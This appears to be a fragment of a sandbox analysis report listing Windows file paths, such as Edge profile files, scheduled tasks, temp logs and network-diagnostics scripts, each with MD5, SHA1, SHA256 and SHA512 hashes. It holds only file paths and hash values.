| SHA1 | bd8bfc144fb5326d21bd1531523d9fb50e1b600a |
| SHA256 | 1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167 |
| SHA512 | 0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 71c4b1323b5c2b0b3dce79a418170c57 |
| SHA1 | f2484755165cc812bd2017c3ff93d7aef8e9f642 |
| SHA256 | b7151a59702581451ad3accb25d5aa7889a4d385142568331f42b0fcc2019872 |
| SHA512 | 9048311d8ca08c33c090038fce1b5f28d22e1b9b0c1a6bb27f97619c778e2d474a3f10ab92c76bd487b94e059b5d066d1d960eec15b6a3a74355099494172e51 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 77d622bb1a5b250869a3238b9bc1402b |
| SHA1 | d47f4003c2554b9dfc4c16f22460b331886b191b |
| SHA256 | f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb |
| SHA512 | d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | a2a3e713b8102a049e33bcd4fee0e4d6 |
| SHA1 | 744cd284be9388f9520a3f4701d23bc9ddcb0146 |
| SHA256 | 195332abc0ac61ad5a80f4afad532924270e08ecff0b889c39b8d1c87475ac90 |
| SHA512 | 41d911e6a4010f34927971f61c4ced3c91388408867367ce35d2e2cf687592f68909704d5ad07c73c95fcfb8cfc5eab0e84e8b3033fc2b1411b2cb6b17ab5c9e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | d84f682c536219c60b20ca215d3e8495 |
| SHA1 | fa7626f812b4f5998713ba2aa4aba0b748493818 |
| SHA256 | 750b2c6291f33326f332f876eadf9ae400a51a0445d294896781391328d6b9fa |
| SHA512 | 76d3e0e886a2afd0d634f66130020dd4cf16ddd8becac2807e37e1b6882c72173d31ef215cd5d5256933ed585cfa20e5178c78f50437b2cee3809904b7b71cba |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 0b9413c83e56e3c23e204843dce03482 |
| SHA1 | 56b4bb587536ec43ccf5d1a1dc549a1008890a0c |
| SHA256 | 78d3158c6a79639b012ef7851b46489a4c020e971482a7be198ec74e63a9a281 |
| SHA512 | 350a951d8413d0d654240a85b561087b10c5aa47c8a2351c8dba3ddb9e9ec3b33a1aace1386983fc0f6730a78028ac2482de1c56fd1c5f4bdfc6bf1d7d08df92 |
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work
| MD5 | 1e8e2076314d54dd72e7ee09ff8a52ab |
| SHA1 | 5fd0a67671430f66237f483eef39ff599b892272 |
| SHA256 | 55f203d6b40a39a6beba9dd3a2cb9034284f49578009835dd4f0f8e1db6ebe2f |
| SHA512 | 5b0c97284923c4619d9c00cba20ce1c6d65d1826abe664c390b04283f7a663256b4a6efe51f794cb5ec82ccea80307729addde841469da8d041cbcfd94feb0f6 |
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work
| MD5 | 0b990e24f1e839462c0ac35fef1d119e |
| SHA1 | 9e17905f8f68f9ce0a2024d57b537aa8b39c6708 |
| SHA256 | a1106ed0845cd438e074344e0fe296dc10ee121a0179e09398eaaea2357c614a |
| SHA512 | c65ba42fc0a2cb0b70888beb8ca334f7d5a8eaf954a5ef7adaecbcb4ce8d61b34858dfd9560954f95f59b4d8110a79ceaa39088b6a0caf8b42ceda41b46ec4a4 |
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work
| MD5 | ceb7caa4e9c4b8d760dbf7e9e5ca44c5 |
| SHA1 | a3879621f9493414d497ea6d70fbf17e283d5c08 |
| SHA256 | 98c054088df4957e8d6361fd2539c219bcf35f8a524aad8f5d1a95f218e990e9 |
| SHA512 | 1eddfbf4cb62d3c5b4755a371316304aaeabb00f01bad03fb4f925a98a2f0824f613537d86deddd648a74d694dc13ed5183e761fdc1ec92589f6fa28beb7fbff |
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work
| MD5 | 7d612892b20e70250dbd00d0cdd4f09b |
| SHA1 | 63251cfa4e5d6cbf6fb14f6d8a7407dbe763d3f5 |
| SHA256 | 727c9e7b91e144e453d5b32e18f12508ee84dabe71bc852941d9c9b4923f9e02 |
| SHA512 | f8d481f3300947d49ce5ab988a9d4e3154746afccc97081cbed1135ffb24fc107203d485dda2d5d714e74e752c614d8cfd16781ea93450fe782ffae3f77066d1 |
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work
| MD5 | 8abf2d6067c6f3191a015f84aa9b6efe |
| SHA1 | 98f2b0a5cdb13cd3d82dc17bd43741bf0b3496f7 |
| SHA256 | ee18bd3259f220c41062abcbe71a421da3e910df11b9f86308a16cdc3a66fbea |
| SHA512 | c2d686a6373efcff583c1ef50c144c59addb8b9c4857ccd8565cd8be3c94b0ac0273945167eb04ebd40dfb0351e4b66cffe4c4e478fb7733714630a11f765b63 |
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work
| MD5 | f313c5b4f95605026428425586317353 |
| SHA1 | 06be66fa06e1cffc54459c38d3d258f46669d01a |
| SHA256 | 129d0b993cd3858af5b7e87fdf74d8e59e6f2110184b5c905df8f5f6f2c39d8b |
| SHA512 | b87a829c86eff1d10e1590b18a9909f05101a535e5f4cef914a4192956eb35a8bfef614c9f95d53783d77571687f3eb3c4e8ee2f24d23ad24e0976d8266b8890 |
C:\Users\Admin\AppData\Local\Temp\Log.tmp
| MD5 | 59c7f92111cb0ed9f61807ad8fb69201 |
| SHA1 | 012a06dd89a0098cb073339865a31f378d1758b8 |
| SHA256 | d5bc36c8062e07c33224b0d332303c430edce4efff9423278766fe68a45003bd |
| SHA512 | cce71225de2f41fb2202449898e3a61d29ba674603813b5aef09c8bb9f904efa1434bcd9965078448b78e94acf7735bae0f345c5dfacff6f27257d60c34c64c7 |
C:\Users\Admin\AppData\Local\Temp\Log.tmp
| MD5 | 9042b277c61a53ff2a33a1c912284a6a |
| SHA1 | 0212cd7f802081b79ffda2150c074da22f17471f |
| SHA256 | 1e0431d52511ec083b0e21858f989d8622bd324321cc14c97152cc34731fb7c3 |
| SHA512 | 7e3db95bb41e2240b73aacb18996e3ec654a7a5b3a8a1e866215652fdc229552b8c6493d65f77e0d48900d7c14c01bf1d2d55ad7662ef6d417b7d52fed4307b1 |
C:\Users\Admin\AppData\Local\Temp\Log.tmp
| MD5 | 41f01682bc2908a8ce161b6246da5639 |
| SHA1 | 9be8f8c21d2478e90115baaa692d6151dcc23718 |
| SHA256 | 5e0f66d762201a494e811400801fe266186a27628f65f83e44c1bcbfdf34661c |
| SHA512 | 88ad5601291e4f917e7fec5f08218eaac9a53bb1aa9566a1b3a9aa01a714cc68b91d79ab01a07cd1a31b747390703211b29ff910e1b3a5f1094c1af0b3d35e13 |
C:\Users\Admin\AppData\Local\Temp\Log.tmp
| MD5 | 58b5892e88a79021b5a3cb67628274a6 |
| SHA1 | 24525deda7f2f67375e2398ff11600285dbcfbf6 |
| SHA256 | 92c2d3506079a411774b46a3884b1701ee6eca86150df379fd24121095b3033d |
| SHA512 | fc5be508111d35234e89f5204b386cb6ff0ceaaf1a275955a8a3ff9e1e77963875f247632a002d0ae8e71d899f01c074db4f308d71b77f396fd67b258e079741 |
C:\Users\Admin\AppData\Local\Temp\Log.tmp
| MD5 | fbf7ea4d37e806d4715d00f163a5f51c |
| SHA1 | 7f25bdfc8896bfbcd752264a03a67f3c5727f8bd |
| SHA256 | e21c5fa361c5353b3e5f4e56b389a094bbd577bc3a3745e4a150d07f3efa2210 |
| SHA512 | 4879988db14df5474b37f5f23b2c758e2c5a0cb6223a6951ccf8fb0d38fbd5e57c7982963e6f3979b46097dc9c5876f38cd2821f72060aeb94a8f53945212aef |
C:\Users\Admin\AppData\Local\Temp\Log.tmp
| MD5 | 7c868fd556f6cdfaf9ccee6bbe6a1c9e |
| SHA1 | ac23dd52faea0d97c6ea727f8ca896f456722a39 |
| SHA256 | 863017562cb081b8d1f69c05ded1df3b4c9d0e2c391a90162b730347b1124001 |
| SHA512 | 10764f83320fbeeef5fe5e77355c4380dda86c5b102622b64d386fdd211c54b6043eda832496e577f832237b8defb0271da671207024889d49f71a40521776cd |
C:\Users\Admin\AppData\Local\Temp\Log.tmp
| MD5 | 7fcd8a23617cdee8cf4d1597f91e53b2 |
| SHA1 | eae7baeb0bd5dabbea13e2a9048dc56c9b8f11bd |
| SHA256 | 62fc3d66c994983cebd413784dcb859a79b89a66e67ea2260ea9afc2434f06df |
| SHA512 | b03045688f41550fe6f802beb22d62f50641aa32276796f639e0a0876c5770034fe580a184961f624e30719f7b91f8c8a27279fb44cb3b914a12f43cc0d566cc |
C:\Users\Admin\AppData\Local\Temp\Log.tmp
| MD5 | d6287061cc091a7f4906611a175eac9d |
| SHA1 | 3c23cf12f57aebce123d1b6cf89dea3fb3f74b21 |
| SHA256 | cecd1db0a4fd12e6da6776882860c254e8bddf3fc5fd802547ff99baac438fea |
| SHA512 | e83a732e0583ee71c0b9a54706c90383ad8c94223811263e05273d235e5659e4df47e284dc13af692462899f577b4591b75ebbc66379b0ea89d03990498b3098 |
C:\Users\Admin\AppData\Local\Temp\Log.tmp
| MD5 | 73828ea24989867e340a28f70bc0c017 |
| SHA1 | 8233b94ec65ad008ca61a743212c36294ec5902e |
| SHA256 | 7122e80459009a96b01d3d73194d4ef244b5d10872c821dadf152d8dcc522b06 |
| SHA512 | cda4f8d81dd1811453c94e71d96ac2d79941b141ee4bb1d8de82eca9d7535f2da0168bb603188611732f1aa9f5b8731b97f6d4d087968cf596d12f1ac2842581 |
C:\Users\Admin\AppData\Local\Temp\Log.tmp
| MD5 | ee7322fcbf96be5b2d33f28d3d915a47 |
| SHA1 | 31cc4c16e197414434b2624ea4d9f961e8f43c23 |
| SHA256 | c6cceaf1c7a00e40efa9d62cc6ab84afe6ba7e4945e2fc79a0c3a250b6a686de |
| SHA512 | 76d5e2e7d072353957bc0f0530a5eae38e82be90824b6c55d30a38e98b93f741ed1e0aff7ca1b8157b6f9c7c62398ba562b86d910f70914ff2492a2512b73b9d |
C:\Users\Admin\AppData\Local\Temp\Log.tmp
| MD5 | f74d89d536e8a2ae426c45a2f3fd0a2b |
| SHA1 | 1dc517678defae8318f216de46e6809617cc5d25 |
| SHA256 | 7d1591b797b62567b88bdaba2a7de55c53742887fbdc9e3aa35c295cb1152431 |
| SHA512 | 5fd3c62f1dc19709b467e7873a693475e3b7430490da74d99099e9f72af3a3f51e4b291da7cb97fa51089a5bc4ef47fa5adfce33ca995b4db378dbe568e2cce9 |
C:\Users\Admin\AppData\Local\Temp\Log.tmp
| MD5 | d78d8756f34b60410512ce9db98f9c7c |
| SHA1 | c3edd333e2b0f09410af79c947c7b835586d47f0 |
| SHA256 | efbfada0a598476ca831cfe468a5a014ab95826926ea75481d36eedb5b0d3b46 |
| SHA512 | 78b3edad5034e1df08ddf3056407aaab6c6b75320d266e7e92a9186c5fbbc4b155723045d92dd15001375030c91bdf0058843f696dfb7ebfb355985bc6b57bda |
C:\Users\Admin\AppData\Local\Temp\Log.tmp
| MD5 | 3bc1b30ea8c274aeea80426314d65e31 |
| SHA1 | 143bd8b11705ba23d42ddb1240f0814404a010c2 |
| SHA256 | ae924a80fce21f9e3c7fd33372b18707f8c590ada8672f1a2ba3be573eb8008b |
| SHA512 | 35088f92c94c85555b88b834ec24fa5e185f24e722a1c4af7621c98d8191e68787396cffbf96e4cea41758fe5ea6f9b3024a5f71b8d45aa4b9093b90d58336d8 |
C:\Users\Admin\AppData\Local\Temp\Log.tmp
| MD5 | 9e7626e66af50dedc18aa0e54a06c7fc |
| SHA1 | f1ce29d2b1aa1e96b57d5fc166e74b7228eb17ba |
| SHA256 | ceedfa84b848fccc3cbcfa09f0db4ac742747cc56b34aad6d999a0d6df78545b |
| SHA512 | 0d4dfb6bba928b9c84c38f2cc6e0ea0ba033e4ca98a8c52408757e661c810e774c059127742400b362c29dce34b4e0563dd212a846d22dde762c1d9ece704501 |
C:\Users\Admin\AppData\Local\Temp\Log.tmp
| MD5 | b6c18bbe93453c0b7a677ad0c2c04afa |
| SHA1 | aa07a6b4ce6ef0f6d149729c978a1493e0f5c3ac |
| SHA256 | 697f8e7ae712731587c97ba88f8de5b0d64e3c737a68b4c31ee89f70bec6dd40 |
| SHA512 | 9ed807f6842d1a19b3c88d8b01b201a14fd9dd1be18055ea04d7a7224f5e630791d9210ba133aed1a45c44b6cbc7b0ca56d991938b2c16da821bf8b71ce46ebe |
C:\Users\Admin\AppData\Local\Temp\Log.tmp
| MD5 | c6af1d6674f7f1da617737000549e4a1 |
| SHA1 | bb6f871f2a32f5ced7ea3ab01c0dc3baa44613d9 |
| SHA256 | 076b4c4c69d1ed14f2ad63fe8310bb1d0ab0a892c3e6d49f29ef973aa336c4f0 |
| SHA512 | 41d41e4f640c13fce3b20f8677604c279e1956e9ef0a7cd0ffc0f1a2a958784d1902dd9e3c5adade1fabcb5870b480b0474a05d752f43db3fd3970c924484d00 |
C:\Users\Admin\AppData\Local\Temp\Log.tmp
| MD5 | dbdcb0970437c0f8c1c323629042c834 |
| SHA1 | 8b9b67857faac0002119cc73f4acb080e1bc0234 |
| SHA256 | 8335a76d2c2f08188251ef5847d5746607cea085d70724a6e295d5573cae7b7b |
| SHA512 | 0533142a4e58023ced4222c752e87263b7946a4f235523e648556ad92123957edc23406e8ab4d5a4711813f9bd373126b414a8c3bd40cd554a0513228665fba3 |
C:\Users\Admin\AppData\Local\Temp\Log.tmp
| MD5 | 9a0916ade2f9a068803a48288b09171b |
| SHA1 | 80d9a010a5638ce00db38f8b877a26b48c2ee146 |
| SHA256 | 858d1b6c253e13e864b1a5d335ddcb2c101b1970272010c977556e55d044af07 |
| SHA512 | 1082460c2305a157e9215aae71968a40b9c13a547e71cdae98b829aed5457278ff939ad4a920bffa77ac7f262c7dc849b6e26ed48741d542fee71c017db0f857 |
C:\Users\Admin\AppData\Local\Temp\NDFFDA9.tmp
| MD5 | 7af2f1a5ffb42f118679c7249e931c88 |
| SHA1 | f837dae90ae7d7a9257230a7d98739619e1dda18 |
| SHA256 | 70ffa89e0af89bf86cccc17d50dc9659694f5ed0b27b78a04a3275a1bc41c8d0 |
| SHA512 | a2df0f344fb8f7e2bf50db07302e619fdb9f2d2d8a5f170110c774643a6e9ebc5ec1d4d4f68cd2872599b00167b261a4fe458eaa7cef65502c6f0619cffb5007 |
C:\Windows\Temp\SDIAG_afe58d0b-e6fa-48c8-9e9f-4a61efd35c9c\en-US\DiagPackage.dll.mui
| MD5 | 44c4385447d4fa46b407fc47c8a467d0 |
| SHA1 | 41e4e0e83b74943f5c41648f263b832419c05256 |
| SHA256 | 8be175e8fbdae0dade54830fece6c6980d1345dbeb4a06c07f7efdb1152743f4 |
| SHA512 | 191cd534e85323a4cd9649a1fc372312ed4a600f6252dffc4435793650f9dd40d0c0e615ba5eb9aa437a58af334146aac7c0ba08e0a1bf24ec4837a40f966005 |
C:\Windows\Temp\SDIAG_afe58d0b-e6fa-48c8-9e9f-4a61efd35c9c\DiagPackage.dll
| MD5 | 580dc3658fa3fe42c41c99c52a9ce6b0 |
| SHA1 | 3c4be12c6e3679a6c2267f88363bbd0e6e00cac5 |
| SHA256 | 5b7aa413e4a64679c550c77e6599a1c940ee947cbdf77d310e142a07a237aad2 |
| SHA512 | 68c52cd7b762b8f5d2f546092ed9c4316924fa04bd3ab748ab99541a8b4e7d9aec70acf5c9594d1457ad3a2f207d0c189ec58421d4352ddbc7eae453324d13f2 |
C:\Windows\TEMP\SDIAG_afe58d0b-e6fa-48c8-9e9f-4a61efd35c9c\NetworkDiagnosticsTroubleshoot.ps1
| MD5 | d0cfc204ca3968b891f7ce0dccfb2eda |
| SHA1 | 56dad1716554d8dc573d0ea391f808e7857b2206 |
| SHA256 | e3940266b4368c04333db89804246cb89bf2073626f22b8de72bea27c522282a |
| SHA512 | 4d2225b599ad8af8ba8516f12cfddca5ec0ce69c5c80b133a6a323e9aaf5e0312efbcfa54d2e4462a5095f9a7c42b9d5b39f3204e0be72c3b1992cf33b22087c |
C:\Windows\TEMP\SDIAG_afe58d0b-e6fa-48c8-9e9f-4a61efd35c9c\UtilityFunctions.ps1
| MD5 | c912faa190464ce7dec867464c35a8dc |
| SHA1 | d1c6482dad37720db6bdc594c4757914d1b1dd70 |
| SHA256 | 3891846307aa9e83bca66b13198455af72af45bf721a2fbd41840d47e2a91201 |
| SHA512 | 5c34352d36459fd8fcda5b459a2e48601a033af31d802a90ed82c443a5a346b9480880d30c64db7ad0e4a8c35b98c98f69eceedad72f2a70d9c6cca74dce826a |
C:\Windows\TEMP\SDIAG_afe58d0b-e6fa-48c8-9e9f-4a61efd35c9c\en-US\LocalizationData.psd1
| MD5 | 380768979618b7097b0476179ec494ed |
| SHA1 | af2a03a17c546e4eeb896b230e4f2a52720545ab |
| SHA256 | 0637af30fc3b3544b1f516f6196a8f821ffbfa5d36d65a8798aeeadbf2e8a7c2 |
| SHA512 | b9ef59e9bfdbd49052a4e754ead8cd54b77e79cc428e7aee2b80055ff5f0b038584af519bd2d66258cf3c01f8cc71384f6959ee32111eac4399c47e1c2352302 |
C:\Windows\TEMP\SDIAG_afe58d0b-e6fa-48c8-9e9f-4a61efd35c9c\UtilitySetConstants.ps1
| MD5 | 0c75ae5e75c3e181d13768909c8240ba |
| SHA1 | 288403fc4bedaacebccf4f74d3073f082ef70eb9 |
| SHA256 | de5c231c645d3ae1e13694284997721509f5de64ee5c96c966cdfda9e294db3f |
| SHA512 | 8fc944515f41a837c61a6c4e5181ca273607a89e48fbf86cf8eb8db837aed095aa04fc3043029c3b5cb3710d59abfd86f086ac198200f634bfb1a5dd0823406b |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | c9041f461132e93f594aef4c22567a01 |
| SHA1 | 5c6042634ac65fb3e81ff89c47ce2780ff56b476 |
| SHA256 | d3ec5c00bd2e9d999fa0264e53c52766614364a48c117bc9853889df6fb2019c |
| SHA512 | c597810c990114fca8d86d985db8e61c8562962cc7f0cd07a88f06aa9748569bce1f8db4ae45feeceef993706d2a13754c18200c774846f2cfaba18bd4eb6ee3 |
C:\Windows\TEMP\SDIAG_afe58d0b-e6fa-48c8-9e9f-4a61efd35c9c\StartDPSService.ps1
| MD5 | a660422059d953c6d681b53a6977100e |
| SHA1 | 0c95dd05514d062354c0eecc9ae8d437123305bb |
| SHA256 | d19677234127c38a52aec23686775a8eb3f4e3a406f4a11804d97602d6c31813 |
| SHA512 | 26f8cf9ac95ff649ecc2ed349bc6c7c3a04b188594d5c3289af8f2768ab59672bc95ffefcc83ed3ffa44edd0afeb16a4c2490e633a89fce7965843674d94b523 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | af387375b6efd28eb75029d7643a863c |
| SHA1 | 79a190af5a93a43a898016decfdeeca4bc57ae4c |
| SHA256 | e2ae929ad7023da77c2d48274983b0d1ec3dcf9a7aa26f00fc0dbb97a1ed5945 |
| SHA512 | 2e323be26de02d52af8cda31cfa7356941f6c895edca5790ef26bd51f2716fdcb7fbe1096984854e18e3c3094e08bfecb6a1699e6645e33933a997fe012ed8fc |
C:\Windows\INF\netrasa.PNF
| MD5 | 9aeed08b53f9a8f037159d38c2d1b728 |
| SHA1 | 97104206b0daec8a86c5a042d589e24b0d430885 |
| SHA256 | 32a2f9372c269fa63ce4e19f02bf9d85ac4b3a6d96a8a944eece6a0bf46c3d0a |
| SHA512 | 16598a429371b647e1d84969b77ea14c125c3e70c101abfe5db83b0fea35da6b6d9ec4a1168ef78398a6a1e8b01a77858ea18df02203e34c3395b483066739bb |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 4c2458dd89f8675a223101b66e73c97a |
| SHA1 | d22698525a982c04434316f8824f89f4f8fb3fbb |
| SHA256 | 4d427c92c9f59eb3457a94eca1cbbda4846e9751567848f03d0c1ca259e4aa3d |
| SHA512 | 44c098fbdff31525948865c4da0de6d067aa655d89eb17cf288f952e6e959697d22119d569d070f08824fd7f036e2613fe082dca7816b826051879edadce7b68 |
C:\Windows\Temp\SDIAG_afe58d0b-e6fa-48c8-9e9f-4a61efd35c9c\result\E3E9C8CC-29C3-4744-B7AC-8F89D4A79EFC.Diagnose.Admin.0.etl
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\ShaderCache\GPUCache\data_1
C:\Users\Admin\AppData\Local\ElevatedDiagnostics\460911090\2024062920.000\NetworkDiagnostics.debugreport.xml
C:\Users\Admin\AppData\Local\ElevatedDiagnostics\460911090\2024062920.000\ResultReport.xml
C:\Users\Admin\AppData\Local\ElevatedDiagnostics\460911090\2024062920.000\results.xsl